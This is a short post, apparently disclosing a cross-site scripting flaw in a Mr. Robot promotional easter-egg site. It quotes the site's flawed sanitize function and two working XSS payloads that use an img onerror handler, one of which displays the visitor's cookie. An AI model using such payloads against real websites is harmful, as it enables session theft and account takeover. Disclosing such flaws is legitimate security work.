XSS vulnerability in the Mr. Robot easter egg website (S02E

1. Season 2, Episode 6 Mr. Robot Easter egg has an XSS vulnerability. FSociety wrote a weak
2. function for sanitizing user-input into their virtuel shell ;)
3.  
4. The Easter-egg can be accessed here:
5. http://l4713116.e-corp-usa.com/x/
6.  
7. The sanitize function:
8. function cleanInput(e){return tmp=striptags(e),tmp.replace(/<[^>]+>/gi,"").replace(/<script.*<\/script>/gi,"").replace(/<>/gi,"")
9.  
10. XSS Payload:
11. "0xUID <3's Mr. Robot":
12. '">><marquee><img src=mrrobot onerror=confirm(String.fromCharCode(48,120,85,73,68,32,60,51,39,115,32,77,114,46,32,82,111,98,111,116))></marquee>">
13.  
14. Alert dialog displaying the user's cookie:
15. '">><marquee><img src=mrrobot onerror=confirm(document.cookie)></marquee>">
16.  
17. @0xUID